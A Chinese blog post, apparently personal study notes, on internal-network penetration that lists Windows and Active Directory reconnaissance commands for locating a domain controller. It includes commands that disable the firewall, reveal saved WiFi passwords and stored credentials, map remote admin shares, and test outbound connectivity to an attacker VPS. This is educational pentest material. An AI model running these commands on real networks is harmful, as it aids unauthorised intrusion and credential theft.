

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="August Rosenberg">
  <meta name="keywords" content="">
  
    <meta name="description" content="内网环境分析什么是内网渗透 内网渗透的第一步，内网信息收集  内网外网的简介 内网又称局域网  外网又称为广域网  内外网的区别  内网和外网的覆盖范围不一样，内网通常是一个学校、一个医院的网络，外网通常指Internet网  内网一般是用于局域网内部的计算机之间的互相通信，如果需要访问Internet，需要借助外网，一般可以使用NAT技术实现内网访问外网  内网地址是私有地址和外网的不同">
<meta property="og:type" content="article">
<meta property="og:title" content="内网信息搜集">
<meta property="og:url" content="https://tsy244.github.io/2023/09/12/%E6%B8%97%E9%80%8F/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/index.html">
<meta property="og:site_name" content="AU9U5T">
<meta property="og:description" content="内网环境分析什么是内网渗透 内网渗透的第一步，内网信息收集  内网外网的简介 内网又称局域网  外网又称为广域网  内外网的区别  内网和外网的覆盖范围不一样，内网通常是一个学校、一个医院的网络，外网通常指Internet网  内网一般是用于局域网内部的计算机之间的互相通信，如果需要访问Internet，需要借助外网，一般可以使用NAT技术实现内网访问外网  内网地址是私有地址和外网的不同">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://raw.githubusercontent.com/august244/picture/master/allinit/%E6%B8%97%E9%80%8F/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/%E7%BD%91%E7%BB%9C%E7%8E%AF%E5%A2%83/image-20230912203818546.png">
<meta property="og:image" content="https://raw.githubusercontent.com/august244/picture/master/allinit/%E6%B8%97%E9%80%8F/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240109154756081.png">
<meta property="og:image" content="https://raw.githubusercontent.com/august244/picture/master/allinit/%E6%B8%97%E9%80%8F/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240109165748478.png">
<meta property="og:image" content="https://raw.githubusercontent.com/august244/picture/master/allinit/%E6%B8%97%E9%80%8F/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240109170056352.png">
<meta property="og:image" content="https://raw.githubusercontent.com/august244/picture/master/allinit/%E6%B8%97%E9%80%8F/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240109170225885.png">
<meta property="article:published_time" content="2023-09-12T12:33:30.000Z">
<meta property="article:modified_time" content="2025-06-01T09:42:24.398Z">
<meta property="article:author" content="August Rosenberg">
<meta property="article:tag" content="渗透">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://raw.githubusercontent.com/august244/picture/master/allinit/%E6%B8%97%E9%80%8F/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/%E7%BD%91%E7%BB%9C%E7%8E%AF%E5%A2%83/image-20230912203818546.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>内网信息搜集 - AU9U5T</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"tsy244.github.io","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":90,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":"G-BL1W5LRRDJ","gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>AU9U5T&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="内网信息搜集"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        August Rosenberg
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-09-12 20:33" pubdate>
          September 12, 2023 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          5.9k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          49 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">内网信息搜集</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="内网环境分析"><a href="#内网环境分析" class="headerlink" title="内网环境分析"></a>内网环境分析</h1><h2 id="什么是内网渗透"><a href="#什么是内网渗透" class="headerlink" title="什么是内网渗透"></a>什么是内网渗透</h2><ol>
<li>内网渗透的第一步，内网信息收集</li>
</ol>
<h2 id="内网外网的简介"><a href="#内网外网的简介" class="headerlink" title="内网外网的简介"></a>内网外网的简介</h2><ol>
<li><p>内网又称局域网</p>
</li>
<li><p>外网又称为广域网</p>
</li>
<li><p>内外网的区别</p>
<ul>
<li><p>内网和外网的覆盖范围不一样，内网通常是一个学校、一个医院的网络，外网通常指Internet网</p>
</li>
<li><p>内网一般是用于局域网内部的计算机之间的互相通信，如果需要访问Internet，需要借助外网，一般可以使用<strong>NAT</strong>技术实现内网访问外网</p>
</li>
<li><p>内网地址是私有地址和外网的不同</p>
<p><img src="https://raw.githubusercontent.com/august244/picture/master/allinit/%E6%B8%97%E9%80%8F/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/%E7%BD%91%E7%BB%9C%E7%8E%AF%E5%A2%83/image-20230912203818546.png" srcset="/img/loading.gif" lazyload alt="image-20230912203818546"></p>
</li>
</ul>
</li>
</ol>
<h2 id="windows域环境"><a href="#windows域环境" class="headerlink" title="windows域环境"></a>windows域环境</h2><ol>
<li><p>域环境简介</p>
<p>域是一个有安全边界的计算机集合（ 安全边界，意思是在两个域中，一个域中的用户无法访问另一个域中的资源）；域内资源由一台域控制 器（Domain Controller，DC）集中管理，用户名和密码是放在域控制器去验证的。  </p>
<p><strong>渗透的目标就是拿到域控制器</strong></p>
</li>
<li><p>安全域划分</p>
<p>DMZ（Demilitarized Zone，边界网络，隔离区，安全级别中等）：作为内网中安全系统和非安全系统之间的缓冲区，用于对外提供服务，一般可以放置一  些必须公开的服务器设施  </p>
<p>拥有DMZ区的访问规则</p>
<ul>
<li>内网可以访问外网</li>
<li>外网不能访问内网</li>
<li>外网可以访问DMZ区</li>
<li>内网可以访问DMZ</li>
<li>DMZ不能访问内网</li>
<li>DMZ不能访问外网</li>
</ul>
<p>上面只是通常的做法，具体的还是得看具体的规则怎么实现</p>
<blockquote>
<p>一般如果拿下了DMZ区，可以尝试访问其他地区</p>
</blockquote>
</li>
<li><p>与渗透的思路</p>
<ul>
<li>通过域成员得到域控的IP</li>
<li>通过域成员作为跳板扩大范围</li>
<li>利用域管理员可以登陆域中任何成员主机的特性，定位出域管理员登陆过的主机IP  </li>
<li>设法从域成员主机内存中dump出域管理员密码</li>
</ul>
</li>
<li><p>域渗透的目标</p>
<p>就是拿到域控，因为域控沦陷了，内网就基本可以说掌握中了</p>
</li>
<li><p>连通性判断</p>
<p>tcp 协议：</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">vps</span>：nc -lvvp <span class="hljs-number">8888</span><br><span class="hljs-attribute">target</span>：nc vps-ip <span class="hljs-number">8888</span><br></code></pre></td></tr></table></figure>

<p>DNS协议:</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs stylus">vps：nc -u -lvp <span class="hljs-number">53</span><br>target：<br>nslookup www<span class="hljs-selector-class">.baidu</span><span class="hljs-selector-class">.com</span> vps-ip<br>dig @vsp-ip www<span class="hljs-selector-class">.baidu</span>.com<br></code></pre></td></tr></table></figure>

<p>HTTP:</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">vps</span>：nc -lvvp <span class="hljs-number">80</span><br><span class="hljs-attribute">target</span>：curl vps-ip <span class="hljs-number">80</span><br></code></pre></td></tr></table></figure>

<p>ICMP:</p>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs llvm">vps：tcpdump <span class="hljs-keyword">icmp</span><br><span class="hljs-keyword">target</span>：ping vps-ip<br></code></pre></td></tr></table></figure>
</li>
<li><p>针对一个winserver 安装ad 的时候，原本的administrator 会自动提升到域管理员，密码和原来的一致</p>
</li>
</ol>
<h1 id="内网信息收集"><a href="#内网信息收集" class="headerlink" title="内网信息收集"></a>内网信息收集</h1><h2 id="工作组信息收集"><a href="#工作组信息收集" class="headerlink" title="工作组信息收集"></a>工作组信息收集</h2><h3 id="用户信息"><a href="#用户信息" class="headerlink" title="用户信息"></a>用户信息</h3><ol>
<li><p>查看本机用户目录</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">net user [name]<br></code></pre></td></tr></table></figure>


</li>
<li><p>获取本地管理员信息</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">net localgroup administrators<br></code></pre></td></tr></table></figure>
</li>
<li><p>获取当前在线用户</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs shell;">quser user/[name]<br>query user || qwinsta<br></code></pre></td></tr></table></figure>
</li>
<li><p>查看当前用户的权限</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs powershell">whoami /all<br></code></pre></td></tr></table></figure>
</li>
<li><p>查看当前的权限</p>
  <figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">whoami &amp;&amp; whoami /priv<br></code></pre></td></tr></table></figure>
</li>
<li><p>查看当前机器中的所有组名，了解不同的只能</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">net localgroup<br></code></pre></td></tr></table></figure></li>
</ol>
<h3 id="系统信息"><a href="#系统信息" class="headerlink" title="系统信息"></a>系统信息</h3><ol>
<li><p>查询网络信息，网络地址段信息收集</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">ipconfig /all  <br></code></pre></td></tr></table></figure>


</li>
<li><p>查询操作信息及软件信息</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">systeminfo /fo  list  <br></code></pre></td></tr></table></figure>


</li>
<li><p>查看当前系统版本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sehll">wmic os list  brief<br></code></pre></td></tr></table></figure>


</li>
<li><p>查询本机服务</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">wmic service list brief  <br></code></pre></td></tr></table></figure>


</li>
<li><p>查看安装的软件版本</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">wmic product get name, version<br></code></pre></td></tr></table></figure>


</li>
<li><p>进程信息</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">tasklist</span><br></code></pre></td></tr></table></figure>


</li>
<li><p>查看驱动信息</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">wmic startup <span class="hljs-built_in">get</span> *<span class="hljs-number">*c</span>ommand**,caption<br></code></pre></td></tr></table></figure>


</li>
<li><p>查看本地可用凭据</p>
<figure class="highlight livescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs livescript">cmdkey <span class="hljs-string">\l</span><br></code></pre></td></tr></table></figure>
</li>
<li><p>查看本地密码策略</p>
<figure class="highlight dos"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dos"><span class="hljs-built_in">net</span> accounts<br></code></pre></td></tr></table></figure>
</li>
<li><p>查看dns缓存</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">ipconfig /displaydns<br></code></pre></td></tr></table></figure>
</li>
<li><p>hosts 文件</p>
<figure class="highlight moonscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs moonscript"><span class="hljs-name">c</span>:\Windows\system32\drivers\etc\hosts<br>\etc\hosts<br></code></pre></td></tr></table></figure></li>
</ol>
<h3 id="网络信息"><a href="#网络信息" class="headerlink" title="网络信息"></a>网络信息</h3><ol>
<li><p>查看端口和pid</p>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-attribute">netstat</span> -ano<br>netstat -anob <span class="hljs-comment"># 需要管理员，这个命令可以查询所有端口发起的应用程序</span><br></code></pre></td></tr></table></figure>
</li>
<li><p>查看路由表和<em>arp</em>缓存</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs routeros">route <span class="hljs-built_in">print</span><br>arp -a<br></code></pre></td></tr></table></figure>
</li>
<li><p>查看共享列表</p>
<figure class="highlight dos"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dos"><span class="hljs-built_in">net</span> share<br></code></pre></td></tr></table></figure>
</li>
<li><p>磁盘映射</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">net use k: \\192.168.1.10\c$<br></code></pre></td></tr></table></figure></li>
</ol>
<h3 id="防火墙"><a href="#防火墙" class="headerlink" title="防火墙"></a>防火墙</h3><ol>
<li><p>查看防火墙配置</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">netsh firewall show config<br></code></pre></td></tr></table></figure>
</li>
<li><p>关闭防火墙</p>
<figure class="highlight pf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs pf">netsh advfirewall <span class="hljs-built_in">set</span> allprofiles <span class="hljs-keyword">state</span> off\<span class="hljs-keyword">on</span><br></code></pre></td></tr></table></figure></li>
</ol>
<h3 id="RDP桌面"><a href="#RDP桌面" class="headerlink" title="RDP桌面"></a>RDP桌面</h3><figure class="highlight autoit"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs autoit"><span class="hljs-meta">#开启</span><br>wmic RDTOGGLE WHERE ServerName=<span class="hljs-string">&#x27;%COMPUTERNAME%&#x27;</span> <span class="hljs-built_in">call</span> SetAllowTSConnections <span class="hljs-number">1</span><br><span class="hljs-meta">#关闭</span><br>wmic RDTOGGLE WHERE ServerName=<span class="hljs-string">&#x27;%COMPUTERNAME%&#x27;</span> <span class="hljs-built_in">call</span> SetAllowTSConnections <span class="hljs-number">0</span><br><span class="hljs-meta">#查询并开启RDP服务的端口，返回一个十六进制的端口</span><br>REG QUERY <span class="hljs-string">&quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp&quot;</span> /V PortNum<br>ber<br><br></code></pre></td></tr></table></figure>



<h3 id="获取杀软信息"><a href="#获取杀软信息" class="headerlink" title="获取杀软信息"></a>获取杀软信息</h3><ol>
<li><p>获取杀软名</p>
<figure class="highlight mathematica"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mathematica"><span class="hljs-variable">WMIC</span> <span class="hljs-operator">/</span><span class="hljs-variable">Namespace</span><span class="hljs-operator">:</span>\\<span class="hljs-variable">root</span>\<span class="hljs-variable">SecurityCenter2</span> <span class="hljs-built_in">Path</span> <span class="hljs-variable">AntiVirusProduct</span> <span class="hljs-built_in">Get</span> <span class="hljs-variable">displayName</span> <span class="hljs-operator">/</span><span class="hljs-built_in">Format</span><span class="hljs-operator">:</span><span class="hljs-built_in">List</span><br></code></pre></td></tr></table></figure>
</li>
<li><p>获取杀软名和安装路径</p>
<figure class="highlight mathematica"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mathematica"><span class="hljs-variable">WMIC</span> <span class="hljs-operator">/</span><span class="hljs-variable">Namespace</span><span class="hljs-operator">:</span>\\<span class="hljs-variable">root</span>\<span class="hljs-variable">SecurityCenter2</span> <span class="hljs-built_in">Path</span> <span class="hljs-variable">AntiVirusProduct</span> <span class="hljs-built_in">Get</span> <span class="hljs-variable">displayName</span><span class="hljs-operator">,</span><span class="hljs-variable">productState</span><span class="hljs-operator">,</span><span class="hljs-variable">pathToSignedProductExe</span><br></code></pre></td></tr></table></figure></li>
</ol>
<h3 id="WIFE密码"><a href="#WIFE密码" class="headerlink" title="WIFE密码"></a>WIFE密码</h3><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs routeros">netsh wlan show<span class="hljs-built_in"> profile </span># 用于查询当前主机连接过的wifi名<br>netsh wlan show<span class="hljs-built_in"> profile </span><span class="hljs-attribute">name</span>=<span class="hljs-string">&quot;wifi_name&quot;</span> <span class="hljs-attribute">key</span>=clear # 查询密码<br></code></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/august244/picture/master/allinit/%E6%B8%97%E9%80%8F/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240109154756081.png" srcset="/img/loading.gif" lazyload alt="image-20240109154756081"></p>
<h3 id="powershell信息收集"><a href="#powershell信息收集" class="headerlink" title="powershell信息收集"></a>powershell信息收集</h3><p>通过powershell语法执行ps文件</p>
<h2 id="域内信息收集"><a href="#域内信息收集" class="headerlink" title="域内信息收集"></a>域内信息收集</h2><h3 id="net组件"><a href="#net组件" class="headerlink" title="net组件"></a>net组件</h3><ol>
<li><p>查询当前域</p>
<figure class="highlight maxima"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs maxima">net <span class="hljs-built_in">view</span> /<span class="hljs-built_in">domain</span><br></code></pre></td></tr></table></figure>

<p>但是这个需要将域控的防火墙关闭</p>
</li>
<li><p>查询域内所有主机</p>
<figure class="highlight maxima"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs maxima">net <span class="hljs-built_in">view</span> /<span class="hljs-built_in">domain</span>:august<br></code></pre></td></tr></table></figure>
</li>
<li><p>查询域内所有用户组</p>
<figure class="highlight crmsh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs crmsh">net <span class="hljs-keyword">group</span> <span class="hljs-title">&quot;domain</span> admins<span class="hljs-string">&quot; /domain</span><br></code></pre></td></tr></table></figure>
</li>
<li><p>查询域成员计算机列表</p>
<figure class="highlight crmsh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs crmsh">net <span class="hljs-keyword">group</span> <span class="hljs-title">&quot;domain</span> computers<span class="hljs-string">&quot; /domain</span><br></code></pre></td></tr></table></figure>
</li>
<li><p>查询系统管理员用户组</p>
<figure class="highlight crmsh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs crmsh">net <span class="hljs-keyword">group</span> <span class="hljs-title">&quot;Enterprise</span> admins<span class="hljs-string">&quot; /domain</span><br></code></pre></td></tr></table></figure>
</li>
<li><p>查看域控制器</p>
<figure class="highlight crmsh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs crmsh">net <span class="hljs-keyword">group</span> <span class="hljs-title">&quot;domain</span> controllers<span class="hljs-string">&quot; /domain</span><br></code></pre></td></tr></table></figure>
</li>
<li><p>查看域内所有账号</p>
<figure class="highlight crmsh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs crmsh">net <span class="hljs-keyword">user</span> <span class="hljs-title">/domain</span><br></code></pre></td></tr></table></figure>
</li>
<li><p>查询指定用户详情信息</p>
<figure class="highlight crmsh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs crmsh">net <span class="hljs-keyword">user</span> <span class="hljs-title">xxx</span> /domain<br></code></pre></td></tr></table></figure>
</li>
<li><p>通过找时间查询域控</p>
<figure class="highlight dos"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dos"><span class="hljs-built_in">net</span> <span class="hljs-built_in">time</span> /domain<br></code></pre></td></tr></table></figure>


</li>
<li><p>登录本机的域管理员</p>
<figure class="highlight arcade"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs arcade">net localgroup administrators /<span class="hljs-built_in">domain</span><br></code></pre></td></tr></table></figure></li>
</ol>
<h3 id="Dsquery"><a href="#Dsquery" class="headerlink" title="Dsquery"></a>Dsquery</h3><p>这个工具只有域控才有，可以自己上传一个</p>
<ol>
<li><p>查看域内的所有的机器</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">dsquery computer</span><br></code></pre></td></tr></table></figure>
</li>
<li><p>查看当前域内的所有的用户名</p>
<figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dockerfile">dsquery <span class="hljs-keyword">user</span><br></code></pre></td></tr></table></figure></li>
</ol>
<h3 id="other"><a href="#other" class="headerlink" title="other"></a>other</h3><ol>
<li><p>域控制器的机器名</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ruby">nltest /<span class="hljs-variable constant_">DCLIST</span><span class="hljs-symbol">:MINGY</span><br></code></pre></td></tr></table></figure>
</li>
<li><p>查看域内的主机名</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">netdom query pdc</span><br></code></pre></td></tr></table></figure>
</li>
<li><p>查看域控的主机名</p>
<figure class="highlight sqf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sqf">nslookup -<span class="hljs-built_in">type</span>=srv <span class="hljs-variable">_ldap</span>.<span class="hljs-variable">_tcp</span><br></code></pre></td></tr></table></figure>

<p>这个指令可以获取域控的Ip</p>
</li>
<li><p>查看域内DNS服务器</p>
</li>
</ol>
   <figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">nslookup <span class="hljs-attribute">-q</span>=ns mingy.com<br></code></pre></td></tr></table></figure>

<h3 id="定位域控"><a href="#定位域控" class="headerlink" title="定位域控"></a>定位域控</h3><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">ipconfig /<span class="hljs-keyword">all</span><br>nslookup -<span class="hljs-keyword">type</span>=<span class="hljs-keyword">all</span> _ldap._tcp.dc._msdcs.mingy.com<br>setspn -q *<span class="hljs-comment">/*</span><br><span class="hljs-comment">setspn -T mingy.com -q */</span>*<br>net <span class="hljs-keyword">group</span> &quot;domain controllers&quot; /<span class="hljs-keyword">domain</span><br></code></pre></td></tr></table></figure>

<p>除了以上的命令还可以使用端口识别的方式</p>
